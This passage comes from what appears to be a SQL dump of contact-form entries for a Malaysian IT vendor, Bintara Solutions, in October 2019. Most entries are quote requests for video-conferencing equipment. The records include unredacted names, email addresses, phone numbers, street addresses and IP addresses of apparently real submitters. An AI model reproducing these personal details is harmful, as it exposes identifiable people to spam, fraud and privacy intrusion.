Qian\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"qian.lim@cleanprolaundry.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0182187377\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Cleanpro Laundry Holding Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:154:\"I would like to have quotation to setup Video Conference (VC) Meeting Room. Meeting Room size is around 10- 20 people size. Is there any suggest solution?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-02 09:41:17','175.138.73.27','1'),(318,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Tommy Gan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"tommy@4burcscec.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162387892\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"China Construction Pearl River (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:145:\"Looking for quotation for a video conference solution for our meeting room. The product must be compatible with the software PolyCom RealPresence\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-04 14:32:10','175.136.216.80','1'),(319,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Zainal Abidin Mahassan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"zainalam@key2com.net\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"018 2115 040\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Key Two Communications Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:86:\"Please qoute us 1 unit Panasonic TOUGHPAD FZ-G1 for budgetary purposes for our client.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-05 11:05:50','60.54.45.37','1'),(320,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"SITI MARIYAM BINTI MAMAT\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"SMARIYAM@UTM.MY\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0197527271\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"UTM SKUDAI\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:45:\"FAKULTI KEJURUTERAAN, BLOCK V01,81300, SKUDAI\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Logitech Rally, Screen Share\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:138:\"boleh sediakan cadangan peralatan yang di perlukan untuk set meeting. 1- lokasi urusetia, 6 lokasi mesyuarat lain (10 orang setiap lokasi)\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"19\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-06 11:26:17','161.139.222.168','1'),(321,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Azmi Ramlee\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"azmiramlee@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60196633712\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"PMCare Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"NO. 1 JALAN USJ 21/10\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Logitech Group, Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:132:\"Medium sized room. Typically 7-9 pax. Please qoute for two (2) additional satellite mics. Do you have any similar product from Poly?\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-07 12:02:09','124.13.10.98','1'),(322,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"TEST\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"1234\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"TEST\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-07 16:28:45','104.132.20.81','1'),(323,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"TEST\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"test@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"1234\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"test\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"TEST\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-07 16:29:00','104.132.20.81','1'),(324,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Aisyah\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"puteri.aisyah@platiform.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0361581133\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"PLATIFORM (M) SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:149:\"Request for Quotation. Hi, I was wondering if you carry the product BCC950. If yes, can we get a quotation for one unit, please. Thank you very much.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"55\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-10-07 18:20:19','110.159.20.123','1'),(325,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Leo Koay\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"leokoay@ada2u.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"+6046192500\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"ADA Shared Services Sdn. Bhd.\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"1-21-01, Suntech @ Penang Cybercity\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech 